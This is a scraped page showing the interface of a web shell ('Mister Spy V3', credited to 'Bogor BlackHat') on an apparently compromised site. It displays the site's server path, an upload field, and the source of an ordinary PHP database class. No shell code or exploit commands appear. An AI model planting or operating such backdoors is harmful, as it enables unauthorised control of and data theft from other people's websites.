Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/web/library/
Upload File :
Current File : /home/caballoscriollos/public_html/web/library/class.entidades.php

<?php

require_once('class.db.php');
require_once('class.dbaccess.php');
require_once('class.entidad.php');

class Entidades extends DBAccess
{
	public function GetAll()
	{
		$sql = " SELECT *";
		$sql.= " FROM tblEntidades";
		$sql.= " WHERE 1";
		$sql.= " ORDER BY Orden ASC";

		if ( !($oRes = $this->GetQuery($sql)) )
			return false;
			
		$arr = array();

		while ($oRow = $oRes->GetRow())	
		{	
			$oEntidad = new Entidad();
			$oEntidad->ParseFromArray($oRow);
			
			array_push($arr, $oEntidad);
			
			$oRes->MoveNext();
		}	
		
		return $arr;		
	}


	public function GetAllActivos()
	{
		$sql = " SELECT *";
		$sql.= " FROM tblEntidades";
		$sql.= " WHERE Activo = " . DB::Bool(true);
		$sql.= " ORDER BY Orden ASC";

		if ( !($oRes = $this->GetQuery($sql)) )
			return false;
			
		$arr = array();

		while ($oRow = $oRes->GetRow())	
		{	
			$oEntidad = new Entidad();
			$oEntidad->ParseFromArray($oRow);
			
			array_push($arr, $oEntidad);
			
			$oRes->MoveNext();
		}	
		
		return $arr;		
	}


	public function GetById($IdEntidad)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblEntidades";
		$sql.= " WHERE IdEntidad = " . DB::Number($IdEntidad);	
			
		if ( !($oRes = $this->GetQuery($sql)) )
			return false;
			
		if ( !($oRow = $oRes->GetRow()) )
			return false;
		
		$oEntidad = new Entidad();
		$oEntidad->ParseFromArray($oRow);

		return $oEntidad;
	}


	public function Update(Entidad $oEntidad)
	{
		$arr = array
		(
			'Codigo' => DB::String($oEntidad->Codigo),
			'Activo' => DB::Bool($oEntidad->Activo)
		);

		$where = " IdEntidad = " . (int)$oEntidad->IdEntidad;
		
		if (!DBAccess::UpdateEntidad('tblEntidades', $arr, $where))
			return false;
		
		return $oEntidad;
	}
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat